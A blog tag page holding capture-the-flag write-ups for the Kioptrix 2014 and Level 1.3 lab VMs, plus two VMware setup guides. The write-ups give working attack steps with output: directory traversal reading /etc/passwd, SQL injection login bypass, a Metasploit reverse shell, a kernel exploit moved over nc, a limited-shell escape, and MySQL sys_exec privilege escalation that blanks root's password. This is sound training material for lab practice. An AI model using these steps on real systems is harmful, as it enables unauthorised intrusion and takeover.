Browse Tag

vm

Write-up for Kioptrix: 2014 (#5)

Nov 02, 2016
/
Resources, Write-ups

This is the finale post of the kioptrix series writeup.

Perform hosts discovery using nmap
> nmap -Pn 192.168.117.0/24 -T5 –version-light

Nmap scan report for 192.168.117.133
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 00:0C:29:BD:C5:DD (VMware)

Only two ports?

Let’s use the directory buster to check if there is any interesting webpages or login form,
> dirb http://192.168.117.133

+ http://192.168.117.133/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.117.133/index.html (CODE:200|SIZE:152)
> dirb http://192.168.117.133:8080
+ http://192.168.117.133:8080/cgi-bin/ (CODE:403|SIZE:210)

No luck!

Perform Nikto vulnerability scan on the servers
> nikto -h http://192.168.117.133

– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.117.133
+ Target Hostname: 192.168.117.133
+ Target Port: 80
+ Start Time: 2016-10-27 13:52:44 (GMT8)
—————————————————————————
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sun Mar 30 01:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

We will look into this again if required. Let’s try to navigate to the web page first.

Navigating to the website hosted on HTTP server port 8080 – it says that I don’t have the permission to access the page.

Moving on to the HTTP server port 80, it gives me the default page saying “It Works”.

However, the good news is that its source contains something that is not included in the default page.

<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

Let’s try to navigate to the mentioned URL:
> 192.168.117.133/pChart2.1.3/index.php

Google for known vulnerabilities

Indeed, check out this website, it basically documented the multiple vulnerabilities which existed in pChart version 2.1.3 – which consists of directory traversal and cross-site scripting.

Perform directory traversal

Using the instructions shown on the website I shared earlier, we can perform directory using the following sample code reference,

“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd”

In our case, run the exact following line (replace to your target’s IP address, of course)
> http://192.168.117.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

Directory traversal is working. Remember the page at port 8080, the one which denies me from viewing due to insufficient file permission?

Let’s check out the apache HTTP server settings to see what were its settings and configurations.

Note that this is a FreeBSD server, which means that the config file is located at /usr/local/etc/apache2x/httpd.conf
> http://192.168.117.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

Bingo, it works.

The following is suspiciously interesting,

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

It basically means that the results will only be allowed to shown on Mozilla Firefox browser 4.

After some research, I have gotten the user agent information of Mozilla 4,

Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)

To use it, there are many ways. For me, I uses a Firefox plugin called Quick Preference Button. It has a lot of components with it, but you just have to change the item under Prefs>Spoof>Custom and then enter the above user agent information.

Now that you are accessing the web site using Mozilla 4 user agent, you can finally view the page,

The phptax web page information looks pretty old school.

Did some research, noticed that there are readily available modules in Metasploit to exploit on phptax.
> msfconsole
> search phptax

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/http/phptax_exec 2012-10-08 excellent PhpTax pfilez Parameter Exec Remote Code Injection

> use exploit/multi/http/phptax_exec
> set rhost 192.168.117.133
> set rport 8080
> exploit

[*] Started reverse TCP double handler on 192.168.117.128:4444
[*] 192.168.117.1338080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo UPBXBAbsRsBHMrXp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo PLFkF52o2dwDMsR3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “UPBXBAbsRsBHMrXp\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “PLFkF52o2dwDMsR3\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.117.128:4444 -> 192.168.117.133:48546) at 2016-10-27 14:51:35 +0800
[*] Command shell session 2 opened (192.168.117.128:4444 -> 192.168.117.133:63426) at 2016-10-27 14:51:35 +0800

> id

uid=80(www) gid=80(www) groups=80(www)

Now we have a limited shell as user www.

Check the kernel version
> uname -a

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64

Search for vulnerability on FreeBSD version 9.0
> Check out FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation

Download and host the exploit code on your attacker machine
> nc -lvp 6666 < getr00t.c

Download it using the limited shell at your target machine
> nc -nv 192.168.117.133 6666 > r00t.c

Finally, compile the code
> gcc r00t.c
> ./a.out

[+] SYSRET FUCKUP!!
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!

> id

uid=0(root) gid=0(wheel) groups=0(wheel)

Congrats, you are now root!

> cd /root
> cat congrats.txt

If you are reading this, it means you got root (or cheated).
Congratulations either way…

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can’t enjoy them.

As with all my VMs, besides getting “root” on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and “hope” it works, but think about the traffic.. the logs… Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won’t from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren’t in “/var/log/apache/access.log”, but in “/var/log/httpd-access.log”.
It’s default document root is not “/var/www/” but in “/usr/local/www/apache22/data”.
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed “OSSEC-HIDS” and monitored a few things.
Default settings, nothing fancy but it should’ve logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn’t support “iNotify”, I couldn’t use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should’ve detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good…

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each “web attack” detected by OSSEC-HIDS, by
default it would’ve blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part 🙂
Here we conclude the Kioptrix CTF series.
Cheers.

And yes, this concludes my Kioptrix series write-up! Cheers.

Write-up for Kioptrix: Level 1.3 (#4)

Oct 31, 2016
/
Resources, Write-ups

Once again, a continuation of the Kioptrix series writeup!

First of all, something different about the VM for Kioptrix level 1.3 (#4) is that unlike the rest of the previous VMs, #4 only comes with a Virtual Machine Disk (VMDK) file. As such, you cannot open it normally like what you have done for the past VMs.

Click here to view my step-by-step guide to create a VM using existing VMDK file, which is ideal in this case.

Scan for the VM using nmap
> nmap 192.168.117.100-200 -Pn -T5

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-26 21:29 SGT
Nmap scan report for 192.168.117.132
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:7C:1F:EC (VMware)
Scan the web server for possible web pages

Run Directory Buster
> dirb http://192.168.117.132

—- Scanning URL: http://192.168.117.132/ —-
+ http://192.168.117.132/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.117.132/images/
+ http://192.168.117.132/index (CODE:200|SIZE:1255)
+ http://192.168.117.132/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.117.132/john/
+ http://192.168.117.132/logout (CODE:302|SIZE:0)
+ http://192.168.117.132/member (CODE:302|SIZE:220)
+ http://192.168.117.132/server-status (CODE:403|SIZE:335)

—- Entering directory: http://192.168.117.132/images/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://192.168.117.132/john/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

Run GoBuster
> gobuster -u ‘http://192.168.117.132’ -w /usr/share/wordlists/dirb/big.txt

Gobuster v1.2 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://192.168.117.132/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 200,204,301,302,307
=====================================================
/images (Status: 301)
/index (Status: 200)
/john (Status: 301)
/logout (Status: 302)
/member (Status: 302)
/robert (Status: 301)

Visit the webpage hosted on target machine

Perform SQL Injection

Back to the login back, let’s try to log in as john or Robert

Simply enter the following into the login field
> username: john
> password: ‘ or 1=1 —

Do the same using username “robert” and you will have the following 2 credentials for login,

john / MyNameIsJohn
robert / ADGAdsafdfwt4gadfga==

Login via SSH
> ssh [email protected]

> ssh [email protected]

Both users are using lshell, which is a limited shell based on Python.

After some research, seems like it is possible to escape from this shell by using the echo command to call os.system

> echo os.system(‘/bin/bash’)
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> ls -la /home/loneferret

total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw——- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history
-rw-r–r– 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout
-rw-r–r– 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r–r– 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory
-rw——- 1 root root 68 2012-02-04 10:05 .my.cnf.5086
-rw——- 1 root root 1 2012-02-04 10:05 .mysql.5086
-rw——- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history
-rw——- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history
-rw-r–r– 1 loneferret loneferret 586 2012-02-04 09:58 .profile
-rw-r–r– 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful

Check MySQL is being run by which user
> ps -ef | grep mysql

root 4892 1 0 Oct29 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe
root 4934 4892 0 Oct29 ? 00:00:04 /usr/sbin/mysqld –basedir=/usr
root 4935 4892 0 Oct29 ? 00:00:00 logger -p daemon.err -t mysqld_s
john 6119 6071 0 00:57 pts/0 00:00:00 grep mysql

Good news, seems like MySQL is running as root. Let’s see if its login credentials are hard-coded in the HTTP server configuration file
> ls /var/www

checklogin.php images john logout.php robert
database.sql index.php login_success.php member.php

> cat /var/www/checklogin.php

[ … omitted … ]
$host=”localhost”; // Host name
$username=”root”; // Mysql username
$password=””; // Mysql password
$db_name=”members”; // Database name
$tbl_name=”members”; // Table name
[ … omitted … ]

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 854
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.

After some research, seems like we can perform privilege escalation from a MySQL server running as root.

In essence, since we are able to access MySQL server as root, we can utilize this permission level to run something called User Defined Functions (UDF) to perform privilege escalation.

To do so, we need to download the lib_mysqludf_sys.so library, which will allow us to perform commands that can achieved our goal.

The following are its most commonly used functions,

sys_eval (executes an arbitrary command, and returns its output)
sys_exec (executes an arbitrary command, and returns it’s exit code)

However, the good news is that there is no need to download them in this case because they already exists in the VM. Thanks the creator!
> whereis lib_mysqludf_sys.so

/usr/lib/lib_mysqludf_sys.so

mysql> SELECT sys_exec(‘chown john.john /etc/shadow’);

+—————————————–+
| sys_exec(‘chown john.john /etc/shadow’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

mysql> SELECT sys_exec(‘chown john.john /etc/passwd’);

+—————————————–+
| sys_exec(‘chown john.john /etc/passwd’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

mysql> SELECT sys_exec(‘chown -R john.john /root’);

+————————————–+
| sys_exec(‘chown -R john.john /root’) |
+————————————–+
| NULL |
+————————————–+
1 row in set (0.01 sec)

> cat /root/congrats.txt

Congratulations!

You’ve got root.

There is more then one way to get root on this system. Try and find them.
I’ve only tested two (2) methods, but it doesn’t mean there aren’t more.
As always there’s an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.

It took a while to make this. For one it’s not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.

If you haven’t already, check out the other VMs available on:
www.kioptrix.com

Thanks for playing,
Loneferret

No, not yet. We are not root yet, only managed to read the files of root.
> id

uid=1001(john) gid=1001(john) groups=1001(john)

> cat /etc/shadow

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::
daemon:*:15374:0:99999:7:::
bin:*:15374:0:99999:7:::
sys:*:15374:0:99999:7:::
sync:*:15374:0:99999:7:::
games:*:15374:0:99999:7:::
man:*:15374:0:99999:7:::
lp:*:15374:0:99999:7:::
mail:*:15374:0:99999:7:::
news:*:15374:0:99999:7:::
uucp:*:15374:0:99999:7:::
proxy:*:15374:0:99999:7:::
www-data:*:15374:0:99999:7:::
backup:*:15374:0:99999:7:::
list:*:15374:0:99999:7:::
irc:*:15374:0:99999:7:::
gnats:*:15374:0:99999:7:::
nobody:*:15374:0:99999:7:::
libuuid:!:15374:0:99999:7:::
dhcp:*:15374:0:99999:7:::
syslog:*:15374:0:99999:7:::
klog:*:15374:0:99999:7:::
mysql:!:15374:0:99999:7:::
sshd:*:15374:0:99999:7:::
loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::
john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::
robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::

Now, modify the /etc/passwd file and remove the ‘x’ as highlighted in red below

root:x:0:0:root:/root:/bin/bash

Modify the /etc/shadow file and remove the chars as highlighted in red below

root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::

Back to MySQL again, we will change the owner of ssh config files to john

mysql> SELECT sys_exec(‘chown -R john.john /etc/ssh’);

+—————————————–+
| sys_exec(‘chown -R john.john /etc/ssh’) |
+—————————————–+
| NULL |
+—————————————–+
1 row in set (0.00 sec)

Modify the /etc/ssh/sshd_config file and identify the following line as highlighted in red. Change it to yes.

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

And also find the following line, as highlighted in red. It should be at the very last line. Change it to no.

UsePAM yes

We are done with the edits. Save the file now and reboot the system for the changes to take effect.

> mysql> SELECT sys_exec(‘reboot’);
> ssh [email protected]
>id

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now logged in as root!
—
I came across an even faster way to get root.

Simply login to MySQL and run the following command to add robert into the admin group, so that he is able to perform sudo as an administrator.
> select sys_exec(‘usermod -a -G admin robert’);

+—————————————-+
| sys_exec(‘usermod -a -G admin robert’) |
+—————————————-+
| NULL |
+—————————————-+
1 row in set (0.03 sec)

Now, perform the sudo su command using robert account.

robert@Kioptrix4:~$ sudo su
[sudo] password for robert:
root@Kioptrix4:/home/robert# whoami
root

There you go, root!

Create Workstation Virtual Machine Using Existing Virtual Disks

Oct 15, 2016
/
Resources

When I download certain Virtual Machines (VM) from the internet, be it for research or practice purposes, sometimes it only comes with a Virtual Machine Disk (VMDK).

VMDK is a form of file format that describes containers for virtual hard disk drives to be used by VM such as VMware Workstation.

The problem is that when you tried to open the VMDK file on your VMware Workstation, it prompts you that the Virtual Machine Configuration (VMX) file is missing, corrupted or deleted.

To solve this issue, you need to create a new VM from scratch and do the setup by hooking it up with the existing VMDK file.

In Workstation, go to File > New > Virtual Machine.
Select Custom and click Next.
Select the hardware compatibility you require and click Next.
In the Guest Operating System Installation selection screen, select I will install the Operating System later and click Next.
Provide a file name and choose the location where you want to save the virtual machine and click Next.
Select the desired networking type for your virtual machine and click Next.
Select Use an Existing Virtual Disk and click Next.
Click Browse and navigate to the location of your existing .vmdk file and click Next.
Review the settings displayed in the Summary window and click Finish.

Hope this helps!

Fixes for VM: No Internet Connectivity

Jul 31, 2016
/
Resources

Have you ever experienced situations when you Virtual Machines (VM) were unable to connect to the internet after you have boot it up?

Initially, you probably only have a loopback IP address like the following, well, you are not alone – it happened to me when I was setting up my new Kali Linux or Ubuntu VM as well.

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:56011078 errors:0 dropped:0 overruns:0 frame:0
          TX packets:56011078 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:4792283266 (4.4 GiB)  TX bytes:4792283266 (4.4 GiB)

You have probably restarted your networking services,

service restart networking

Or performed all kind of different steps, configuring your network, subnet, dhcp, etc information at /etc/network/interfaces but to no avail… you probably have an IP address, but you cannot connect to the internet.

ping: www.google.com: Name or service not known

Today, I am going to share a fix for this issue. It is actually very simple, but it took me a series of troubleshooting before I discover these simple steps to resolve this issue.

Step 1: Simply download the vmnetcfg.exe file, you can easily find an updated copy of the file from the internet. Don’t forget to scan it using virustotal, make it a habit.

By the way, if you are interested, vmnetcfg.exe is a tool which allow users to manage a Windows host computer’s virtual interfaces.

Step 2: Place the vmnetcfg.exe file inside your program files folder.

It is probably located at the default location of “C:\Program Files (x86)\VMware\VMware Workstation” when you installed VMware Workstation to your computer.

Step 3: Here is the most important part. Run your vmnetcfg.exe file, you will find the following window appearing on your screen.

Look for your VMnet0 or whichever port that is mapped to your machine’s network card, select the option of “Bridged (connect VMs directly to the external network)” and choose your network card in the drop down list. When you are done, click “OK” and there you go, your issue is probably fixed.

Well, I hope that this post has served you well and helped you save some time.